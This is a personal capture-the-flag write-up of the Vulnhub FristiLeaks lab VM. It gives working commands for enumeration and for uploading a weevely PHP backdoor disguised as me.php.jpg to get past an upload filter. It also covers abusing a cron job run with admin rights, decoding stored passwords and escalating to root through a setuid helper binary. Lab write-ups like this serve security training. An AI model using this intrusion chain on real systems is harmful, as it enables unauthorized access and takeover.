Vulnhub fristileaks

Enumeration

We’ll start with the usual NMAP our home boy!

nmap --vv -sS -T 4 -Pn -A -sC -p- 192.168.1.124

We only see a 80 open to us but we can see that
Reason: 65396 no-responses and 138 host-prohibiteds

We also see there’s some info in the robots.txt

http-robots.txt: 3 disallowed entries
/cola /sisi /beer

There’s also a version of Apache -> http-server-header: Apache/2.2.15 (CentOS) DAV/2 PHP/5.3.3

There’s also a kernel detect ->

Running: Linux 2.6.X|3.X
OS CPE: cpe:/o:linux:linux_kernel:2.6 cpe:/o:linux:linux_kernel:3
OS details: Linux 2.6.32 - 3.10, Linux 2.6.32 - 3.13

Nikto

Since it’s running a webserver let’s run a nikto on it.

nikto -h 192.168.1.124

Looking at the results we get a little bit more info about more folder found in
the website

There’s an additional /icons/, /images/

dirb

Now let’s run dirb to try to find even more directories

dirb http://192.168.1.124 /usr/share/wordlists/dir/common.txt

This did not give us any valuable information
I’ll try the big.txt wordlist and meanwhile look at the source code of the website.

Two hours later

I just couldn’t find what to do so i had to go read a writeup…

The url was /fristi/ ……………………………………………………………………………………………………………………………………………………………………………………….. ……………………………………………………………………………………………………………………………………………………………………………………….. ……………………………………………………………………………………………………………………………………………………………………………………….. ……………………………………………………………………………………………………………………………………………………………………………………….. ……………………………………………………………………………………………………………………………………………………………………………………….. ……………………………………………………………………………………………………………………………………………………………………………………….. ……………………………………………………………………………………………………………………………………………………………………………………….. ……………………………………………………………………………………………………………………………………………………………………………………….. ……………………………………………………………………………………………………………………………………………………………………………………….. ……………………………………………………………………………………………………………………………………………………………………………………….. ………………………………………………………………………………………………………………………………………………………………………………………..

I only that took that information and stopped reading, let’s continue.

That leads us to a page with a login and a picture. First reflex is looking at the source code.

We can notice that there’s a comment saying

<!—

TODO:

We need to clean this up for production. I left some junk in here to make testing easier.

  • by eezeepz

—>

On the top it’s also written

We use base64 encoding for images so they are inline in the HTML. I read
somewhere on the web, that thats a good way to do it

And near the end of the page we got a base64 in comment out.

We can assume that’s another picture.

Let’s use that code instead of the one loading before trying to break the
login. Or we can use burp intruder to try to break it while we’re doing the
image base64 thingy. That’s a good idea.

So by googling base64 image decoder and pasting the code, we get this word

keKkeKKeKKeKkekkek

Meanwhile i had a burp intruder try to bypass the login using sql injection and
none went throught.

In the source page the comment had a name eezeepz.

Let’s try eezeepz:keKkeKKeKKeKkekkek what if…

And it worked…

So we got an upload page, it smells like a reverse shell

Life is Weevely

Let’s create generate a backdoor in weevely.

weevely generate toor me.php

We’ll upload that php file in the upload page.
But wait a second it doesn’t take php extensions.

We’ll rename me.jpg and try to upload it again and it works perfectly.
It’s being uploaded to uploads/
Let’s try to access the page http://192.168.1.124/fristi/uploads/me.jpg

And there it is.

Weevely the beautiful

Let’s connect to our backdoor

weevely http://192.168.1.124/fristi/uploads/me.jpg toor

And it doesn’t work. I’m assuming it absolutely needs a .php extension ?

After googling the internet for an hour, i found a page that mentions that if we add php in the name file it will allow the php to execute even though it’s a jpg.

So i renamed it to me.php.jpg and tried to weevely again and BOOM! Houston we are in.

Enumeration

Let’s looks for the kernel and OS

uname -a

cat /etc/lsb-re*

The cat won’t work because we’re dealing with Centos instead of a debian machine.

So we got a Linux localhost.localdomain 2.6.32-573.8.1.el6.x86_64 #1 SMP Tue Nov 10 18:01:38 UTC 2015 x86_64 x86_64 x86_64 GNU/Linux

The thing is it’s a patched kernel, so the version of the kernel could already have patched most of the exploits we would find for that version.

Let’s use :audit_filesystem

We don’t get much from it, we got a /home/eezeepz which is the same username that we used to login in the website.

Let’s investigate it.

User eezeepz

If we ls -l his home directory we find a lot of executables. Ummmm. Maybe we can add them to our path file so we can use them ? Do we need to use them ?

Going through the list there’s a note.txt that has information inside.

Yo EZ,

I made it possible for you to do some automated checks,
but I did only allow you access to /usr/bin/* system binaries. I did
however copy a few extra often needed commands to my
homedir: chmod, df, cat, echo, ps, grep, egrep so you can use those
from /home/admin/

Don‘t forget to specify the full path for each binary!

Just put a file called “runthis” in /tmp/, each line one command. The
output goes to the file “cronresult” in /tmp/. It should
run every minute with my account privileges.

Interesting. /home/admin ?

We got this commands to achieve root ?

cbq
cciss_id
cfdisk
chcpu
chgrp
chkconfig
chmod
chown
clock
consoletype
cpio
cryptsetup
ctrlaltdel
cut
halt
hostname
hwclock
kbd_mode
kill
killall5
kpartx
nameif
nano
netreport
netstat
new-kernel-pkg
nice
nisdomainname
nologin
notes.txt
tar
taskset
tc
telinit
touch
tracepath
tracepath6
true
tune2fs
weak-modules
wipefs
xfs_repair
ypdomainname
zcat
zic

Crontab

So the message told us that we could execute commands as admin by creating a runthis file in /tmp. I’ll start by chmod 777 /home/admin

vi runthis

/home/admin/chmod 777 -R /home/admin

We’ll wait for a minute then we’ll be able to enter /home/admin folder.
Once we’re inside with ls -la to see what’s inside.

ls -la

drwxrwxrwx. 3 admin     admin       4096 Apr 28 20:43 .
drwxr-xr-x. 5 root      root        4096 Nov 19  2015 ..
-rw-r--r--. 1 admin     admin         18 Sep 22  2015 .bash_logout
-rw-r--r--. 1 admin     admin        176 Sep 22  2015 .bash_profile
-rw-r--r--. 1 admin     admin        124 Sep 22  2015 .bashrc
-rwxr-xr-x  1 admin     admin      45224 Nov 18  2015 cat
-rwxr-xr-x  1 admin     admin      48712 Nov 18  2015 chmod
-rw-r--r--  1 admin     admin        737 Nov 18  2015 cronjob.py
-rw-r--r--  1 admin     admin         21 Nov 18  2015 cryptedpass.txt
-rw-r--r--  1 admin     admin        258 Nov 18  2015 cryptpass.py
-rwxr-xr-x  1 admin     admin      90544 Nov 18  2015 df
-rwxr-xr-x  1 admin     admin      24136 Nov 18  2015 echo
-rwxr-xr-x  1 admin     admin     163600 Nov 18  2015 egrep
-rwxr-xr-x  1 admin     admin     163600 Nov 18  2015 grep
-rw-r--r--  1 admin     admin         12 Apr 28 17:18 me.txt
-rwxr-xr-x  1 admin     admin      85304 Nov 18  2015 ps
-rw-r--r--  1 admin     admin        113 Apr 30 18:21 ps.txt
drwxr-xr-x  2 apache    apache      4096 Apr 28 20:43 resulsts
-rw-r--r--  1 apache    apache      8563 Apr 28 20:43 rpm_res
-rw-r--r--  1 fristigod fristigod     25 Nov 19  2015 whoisyourgodnow.txt

We got a file called whoisyourgodnow.txt from fritigod that we can cat.

cat whoisyourgodnow.txt

=RFn0AKnlMHMPIzpyuTI0ITG

There’s also a python script with a cryptedpass.txt

cat cryptedpass.txt

mVGZ3O3omkJLmy2pcuTq

We also got a python script that seems to encrypt in base64 then uses rot13 (ceasar cipher) to “reencrypt it”

Another important part of the small script, it encodes the string in base64 then reverses it then does rot13.

So if we take the string in whoisyourgodnow.txt
We decode the rot13 on it (shift 13 characters)

RFn0AKnlMHMPIzpyuTI0ITG becomes ESa0NXayZUZCVmclhGV0VGT

Then we take ESa0NXayZUZCVmclhGV0VGT and reverse it TGV0VGhlcmVCZUZyaXN0aSE

Now we decode TGV0VGhlcmVCZUZyaXN0aSE and it gives LetThereBeFristi!

Well that doesn’t help much but at least we understand what the script does.
We can now also use it on the cryptedpass.txt and it gives out thisisalsopw123

We now got to strings that look to be passwords.
I’ll spawn a tty shell to su to another user using python

python -c 'import pty; pty.spawn("/bin/sh")'

I’ll try login as fristigod using the LetThereBeFristi

Fristigod

It worked! We’re now logged as Fristigod, let’s search for all the files that his the owner.

find / -user 502

Near the end of the list we got some interesting hits

/var/fristigod
/var/fristigod/.bash_history
/var/fristigod/.secret_admin_stuff

Let’s investigate those files.

cat /var/fristigod/.bash_history

ls
pwd
ls -lah
cd .secret_admin_stuff/
ls
./doCom 
./doCom test
sudo ls
exit
cd .secret_admin_stuff/
ls
./doCom 
sudo -u fristi ./doCom ls /
sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom ls /
exit
sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom ls /
sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom
exit
sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom
exit
sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom
sudo /var/fristigod/.secret_admin_stuff/doCom
exit
sudo /var/fristigod/.secret_admin_stuff/doCom
sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom
exit
sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom
exit
sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom
groups
ls -lah
usermod -G fristigod fristi
exit
sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom
less /var/log/secure e
Fexit
exit
exit

We can see that fristigod is running some commands as fristi. Interesting.

If we file doCom, we notice that it’s an executable.


file doCom
doCom: setuid setgid ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.18, not stripped

We’ll use the same command as in the bash_history file

sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom
Usage: ./program_name terminal_command ...

If we look at the bash_history we can see that he reads the file
/var/log/secure a file that is only readable by root. This means that any
command that we append will run as root. Or at least i think so.

We’ll try to change root’s password.

sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom passwd root
New password: lol123

BAD PASSWORD: it is based on a dictionary word
BAD PASSWORD: is too simple
Retype new password: lol123

su root
id
uid=0(root) gid=0(root) groups=0(root)

And there it is.

GG